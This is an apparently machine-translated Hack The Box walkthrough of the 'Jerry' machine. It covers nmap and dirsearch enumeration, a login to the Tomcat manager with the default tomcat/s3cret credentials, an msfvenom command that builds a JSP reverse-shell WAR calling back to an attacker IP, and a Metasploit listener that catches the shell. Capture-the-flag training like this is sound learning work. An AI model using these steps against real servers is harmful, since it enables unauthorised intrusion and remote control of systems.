Shulou(Shulou.com)06/01 Report--

This article focuses on "what is HTB's Jerry penetration test". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn "what is HTB's Jerry penetration test?"

Basic information

Introduction: Hack The Box is an online penetration testing platform. It can help you improve your penetration testing skills and black box testing skills. The platform environment is a simulated real environment, which helps you better adapt to the penetration in the real environment.

Link: https://www.hackthebox.eu/home/machines/profile/144

Description:

Preface

This walkthrough uses the kali system to follow the penetration testing process, opens the tomcat8080 port through the nmap port, logs in to tomcat with a password, uses msfvenom to generate war files and uploads them to tomcat, and obtains shell by bouncing.

1. Information collection 1. Target ip

The IP address is 10.10.10.95

2. Target machine port and service nmap-sV-sS-T4-O-A 10.10.10.95

PORT STATE SERVICE VERSION8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | _ http-server-header: Apache-Coyote/1.1 | _ http-title: Apache Tomcat/7.0.883, website information collection

View port 8080

Scan the directory through dirsearch to get the website directory.

Here I have listed some of the directories that I need.

/ host-manager/html/manager/html/manager/ 2. Vulnerability detection and exploitation 1. Generate Trojan files

Entering the / host-manager/html directory found that the account password is required.

Click cancel, and then return to the interface to find the account number and password

Username= "tomcat"

Password= "s3cret"

If you log in with this password, you cannot log in normally when you return to the 403 page.

Finally, log in successfully under the / manager/ directory

Found that files in war format can be uploaded.

Generate shell files using msfvenom

Msfvenom-p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444-f war > shell.war

2. Use msf to obtain shell

First, set up msf and use msf to listen to port 4444 to get the bounced shell.

Upload the war file on the landing page

Click shell after uploading successfully

Shell was obtained successfully

III. Promotion of rights

What you get in this way is the authority permission to view root.txt directly.

Enter the\ Users\ Administrator\ Desktop directory and find that there is no root.txt but there is flags.

Go to the flags directory and use the type command to view the 2 for the price of 1.txt file

Get root.txt and user.txt

At this point, I believe you have a deeper understanding of "what is HTB's Jerry penetration test". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.